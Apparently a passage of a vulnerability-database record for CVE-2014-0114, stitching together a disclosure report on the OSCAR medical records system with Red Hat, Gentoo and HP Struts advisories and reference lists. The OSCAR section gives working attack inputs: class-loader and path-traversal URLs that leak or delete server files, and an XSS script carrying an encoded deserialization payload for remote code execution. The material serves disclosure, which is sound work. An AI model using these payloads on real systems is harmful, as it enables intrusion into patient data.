Jul 2018 - Vendor and lead developer contacted for follow-up,\ninformed of intended 15 Aug disclosure (no response)\n12 Aug 2018 - Alternate email address attempted for lead developer (no response)\n15 Aug 2018 - Vulnerabilities publicly disclosed\n\n-----\n\nContents:\n\nThis report uses OVE identifiers: http://www.openwall.com/ove/\n\nOVE-20160329-0001: Database backup disclosure or denial of service via\ninsecure dependency\nOVE-20160329-0003: Remote code execution via unsafe object deserialization\nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in\nsecurity report interface\nOVE-20160329-0007: SQL injection\nOVE-20160329-0008: Path traversal\nOVE-20160329-0002: Insecure direct object reference in document manager\nOVE-20160329-0005: Denial of service via resource exhaustion\nOVE-20160329-0006: Insecure password storage\nOVE-20160329-0009: Cross-site request forgery\n\n-----\n\nIssue details:\n\n=== OVE-20160329-0001: Database backup disclosure or denial of service\nvia insecure dependency ===\n\nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to\nCVE-2014-0114. \n\nAn authenticated user can issue the following request with different /\nomitted cookie headers:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster\n\nConsequently, he or she can access (using a valid session cookie),\ne.g., /oscar/OscarBackup.sql.gz\n\nAn unauthenticated attacker is prevented from doing likewise by the\naLoginFiltera servlet filter, but can still carry out a\ndenial-of-service attack impeding any access to the application until\nTomcat is restarted by issuing a request like the following:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid\n\n=== OVE-20160329-0003: Remote code execution via unsafe object\ndeserialization ===\n\nTraceabilityReportProcessor deserializes user-provided data, allowing\nremote code execution given the presence of known-vulnerable libraries\nin the classpath such as ROME 1.0. This functionality is only\navailable to administrators but can be exploited via XSS\n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with\nysoserial. \n\nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is\ninaccessible due to the following exception\naorg.springframework.beans.factory.NoSuchBeanDefinitionException: No\nbean named \u0027oscarSecurityManager\u0027 is defineda, but were it to be\naccessible, it would be vulnerable as well. \n\n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability\nin security report interface ===\n\nlogReport.jsp, in general, does not escape data it outputs to the\npage; in particular, on line 283, prop.getProperty(\"contentId\") is\nprinted unescaped. As a result, if an attacker includes Javascript in\nhis or her username during a login attempt, it will be executed if an\nadministrator views the Security Log Report for that timeframe. The\ntext printed in the \"Keyword\" column is cut off at 80 characters, but\nthat is more than enough to load an externally-hosted script, such as\nthe following script exploiting the deserialization RCE\nOVE-20160329-0003:\n\nvar decodedBase64 =\natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\");\nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));\nfor(var i = 0; i \u003c binaryArray.length; i++) {\n   binaryArray[i] = decodedBase64.charCodeAt(i);\n}\nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"});\nvar formData = new FormData();\nformData.append(\"file\", payload);\nformData.append(\"submit\", \"Generate\");\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\");\nxhr.send(formData);\n\nXSS was not a focus of this test; other confirmed or likely XSS\nvulnerabilities are:\n* Reflected XSS through the errormsg parameter in loginfailed.jsp\n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp\n* Reflected XSS through the noteId parameter, line 1562 in\nCaseManagementViewAction (untested)\n* Reflected XSS through the pdfName parameter when an exception has\nbeen thrown, line 1174 in ManageDocumentAction (untested)\n* Reflected XSS through the pharmaName and pharmaFax parameters, line\n149 in FrmCustomedPDFServlet (untested)\n* Reflected XSS through the id and followupValue parameters, line 81\nin EctAddShortMeasurementAction (untested)\n\n=== OVE-20160329-0007: SQL injection ===\n\nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is\nconcatenated into an SQL statement rather than parameterized; likewise\nthe content parameter on lines 217, 223, and 229 of\nadmin/logReport.jsp. In both cases these errors result in error-based\nSQL injection vulnerabilities; the former allows authenticated users\nwith access to oscarMDS/PatientSearch.jsp to access information beyond\ntheir privilege levels while the latter is accessible only to\nadministrators. \n\n=== OVE-20160329-0008: Path traversal ===\n\nImportLogDownloadAction reads and outputs an arbitrary absolute file\npath provided by the user; DelImageAction deletes a user-specified\nfilename without accounting for the possibility of relative path\ntraversal (i.e., the inclusion of \"../\" in the filename). \n\nAny authenticated user can exploit the former issue to steal files\nfrom the system, e.g.,\n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz\n\nAn authenticated user with access to eforms can delete files writeable\nby the Tomcat user, e.g.,\n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp\n\n=== OVE-20160329-0002: Insecure direct object reference in document manager ===\n\nManageDocumentAction.display() does not check the permissions\nassociated with the requested document ID (doc_no) before providing it\nto the requesting user. Given\n/oscar/dms/ManageDocument.do?method=display\u0026doc_no=X\u0026providerNo=Y, a\nuser with access to the document management interface can view\narbitrary documents by incrementing or decrementing X, regardless of\nwhether they have been marked private. \n\n=== OVE-20160329-0005: Denial of service via resource exhaustion ===\n\nuploadSignature.jsp, which is accessible to and operable by\nunauthenticated users, saves uploaded files to a temporary directory\nbut never deletes them. An attacker can upload many junk files and\neventually consume all disk space available to the /tmp directory,\nimpeding access to the application depending on the functionality in\nquestion and the partition layout of the host system (the effects are\ncrippling and pervasive if /tmp is on the same partition as /; they\nare much less so if /tmp is on a separate partition). \n\n=== OVE-20160329-0006: Insecure password storage ===\n\nPasswords are stored as SHA-1 hashes; unless unusually complex,\npasswords stored in that manner are typically easily recoverable with\na tool such as oclHashcat. In OSCAR each hash is stored as a string of\ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat\nnon-traditional representation adds a bit of programming work to the\ncracking process, but does not represent a major impediment to attack. \n\n=== OVE-20160329-0009: Cross-site request forgery ===\n\nThe application lacks protection against cross-site request forgery\nattacks. A CSRF attack could be used against an administrator to\nexploit the deserialization RCE in a manner similar to the example\nprovided with OVE-20160329-0004. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: struts security update\nAdvisory ID:       RHSA-2014:0474-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-0474.html\nIssue date:        2014-05-07\nCVE Names:         CVE-2014-0114 \n=====================================================================\n\n1. Summary:\n\nUpdated struts packages that fix one security issue are now available for\nRed Hat Enterprise Linux 5. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from the\nCVE link in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL Desktop Workstation (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64\n\n3. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n\n6. Package List:\n\nRHEL Desktop Workstation (v. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm\n\ni386:\nstruts-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm\n\nx86_64:\nstruts-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/struts-1.2.9-4jpp.8.el5_10.src.rpm\n\ni386:\nstruts-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.i386.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.i386.rpm\n\nia64:\nstruts-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.ia64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ia64.rpm\n\nppc:\nstruts-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.ppc.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.ppc.rpm\n\ns390x:\nstruts-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.s390x.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.s390x.rpm\n\nx86_64:\nstruts-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-debuginfo-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-javadoc-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-manual-1.2.9-4jpp.8.el5_10.x86_64.rpm\nstruts-webapps-tomcat5-1.2.9-4jpp.8.el5_10.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0114.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTacDGXlSAg2UNWIIRAhvbAJ0Za5jRat54AcgbIdHKlzbZN1y1hACcC8DR\nHJqJt2S278nXdfwLyGc7EJQ=\n=qMuX\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201607-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: Commons-BeanUtils: Arbitrary code execution\n     Date: July 20, 2016\n     Bugs: #534498\n       ID: 201607-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nApache Commons BeanUtils does not properly suppress the class property,\nwhich could lead to the remote execution of arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Commons BeanUtils users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot -v \"\u003e=dev-java/commons-beanutils-1.9.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0114\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. For further information, refer to the release notes linked to\nin the References section. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04311273\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04311273\nVersion: 1\n\nHPSBGN03041 rev.1 - HP IceWall Configuration Manager running Apache Struts,\nRemote Execution of Arbitrary Code\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-05-26\nLast Updated: 2014-05-26\n\nPotential Security Impact: Remote execution of arbitrary code\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP IceWall\nConfiguration Manager running Apache Struts. \n\nReferences: CVE-2014-0114, SSRT101566\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP IceWall Configuration Manager 3.0 running Apache Struts 1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2014-0114    (AV:N/AC:L/Au:S/C:P/I:P/A:P)       6.5\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided mitigation information to protect against potential risk to\nHP IceWall Configuration Manager running Apache Struts. \n\nMitigation information for the Apache Struts vulnerability (CVE-2014-0114) is\navailable at the following location:\n\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-a\npplications/ba-p/6463188#.U2J7xeaSxro\n\nJapanese information is available at the following location:\n\nhttp://www.hp.com/jp/icewall_patchaccess\n\nNote: The HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 26 May 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0114"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          },
          {
            "db": "BID",
            "id": "67121"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0114"
          },
          {
            "db": "PACKETSTORM",
            "id": "126692"
          },
          {
            "db": "PACKETSTORM",
            "id": "149050"
          },
          {
            "db": "PACKETSTORM",
            "id": "126525"
          },
          {
            "db": "PACKETSTORM",
            "id": "137980"
          },
          {
            "db": "PACKETSTORM",
            "id": "154792"
          },
          {
            "db": "PACKETSTORM",
            "id": "126811"
          }
        ],
        "trust": 3.24
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41690",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0114"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-0114",
            "trust": 4.2
          },
          {
            "db": "BID",
            "id": "67121",
            "trust": 1.9
          },
          {
            "db": "JVN",
            "id": "JVN30962312",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "59118",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59480",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59246",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "60177",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59479",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "58710",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59718",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59430",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59464",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "58851",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59228",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59704",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59014",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "57477",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "59245",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "58947",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "60703",
            "trust": 1.6
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2014/07/08/1",
            "trust": 1.6
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2014/06/15/10",
            "trust": 1.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSMA-20-184-01",
            "trust": 1.4
          },
          {
            "db": "HITACHI",
            "id": "HS14-018",
            "trust": 0.9
          },
          {
            "db": "HITACHI",
            "id": "HS14-020",
            "trust": 0.9
          },
          {
            "db": "JUNIPER",
            "id": "JSA10643",
            "trust": 0.9
          },
          {
            "db": "JVN",
            "id": "JVNVU96290700",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002308",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056",
            "trust": 0.8
          },
          {
            "db": "CS-HELP",
            "id": "SB2022072128",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.1427",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.1089",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.3134",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.2355",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.0544",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.2568",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2293.2",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0114",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126692",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "149050",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126525",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "137980",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "154792",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126811",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0114"
          },
          {
            "db": "BID",
            "id": "67121"
          },
          {
            "db": "PACKETSTORM",
            "id": "126692"
          },
          {
            "db": "PACKETSTORM",
            "id": "149050"
          },
          {
            "db": "PACKETSTORM",
            "id": "126525"
          },
          {
            "db": "PACKETSTORM",
            "id": "137980"
          },
          {
            "db": "PACKETSTORM",
            "id": "154792"
          },
          {
            "db": "PACKETSTORM",
            "id": "126811"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-581"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-006468"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000056"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0114"
          }
        ]
      },
      "id": "VAR-201404-0288",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.4253262875
      },
      "last_update_date": "2026-03-09T21:53:46.914000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "OpenClinic\u00a0GA",
            "trust": 0.8,
            "url": "https://sourceforge.net/projects/open-clinic/"
          },
          {
            "title": "BEANUTILS-463",
            "trust": 0.8,
            "url": "https://issues.apache.org/jira/browse/BEANUTILS-463"
          },
          {
            "title": "Commons BeanUtils Package Version 1.9.2 Release Notes",
            "trust": 0.8,
            "url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt"
          },
          {
            "title": "Impact of CVE-2014-0094 / CVE-2014-0114",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/cve2014-0094-0114.html"
          },
          {
            "title": "Interstage Business Application Server, Interstage Application Server, Interstage Apworks, Interstage Studio, Interstage Application Framework Suite, Interstage Job Workload Server, Interstage Service Integrator: vulnerability in Struts (CVE-2014-0114)",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_bas_201401.html"
          },
          {
            "title": "Interstage Navigator Explorer Server: vulnerability in Struts (CVE-2014-0114)",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/interstage_nes201401.html"
          },
          {
            "title": "HS14-018",
            "trust": 0.8,
            "url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-018/index.html"
          },
          {
            "title": "HS14-020",
            "trust": 0.8,
            "url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-020/index.html"
          },
          {
            "title": "1676303",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
          },
          {
            "title": "1676375",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
          },
          {
            "title": "1676931",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
          },
          {
            "title": "1675523",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675523"
          },
          {
            "title": "1678621",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678621"
          },
          {
            "title": "1680848",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680848"
          },
          {
            "title": "1680194",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194"
          },
          {
            "title": "NTT DATA Corporation website",
            "trust": 0.8,
            "url": "http://www.nttdata.com/global/en/news-center/others/2014/052300.html"
          },
          {
            "title": "Text Form of Oracle Critical Patch Update - October 2014 Risk Matrices",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014verbose-1972962.html"
          },
          {
            "title": "Oracle Critical Patch Update Advisory - October 2014",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
          },
          {
            "title": "Oracle Critical Patch Update Advisory - January 2015",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
          },
          {
            "title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html"
          },
          {
            "title": "Oracle Critical Patch Update Advisory - July 2014",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
          },
          {
            "title": "Text Form of Oracle Critical Patch Update - July 2014 Risk Matrices",
            "trust": 0.8,
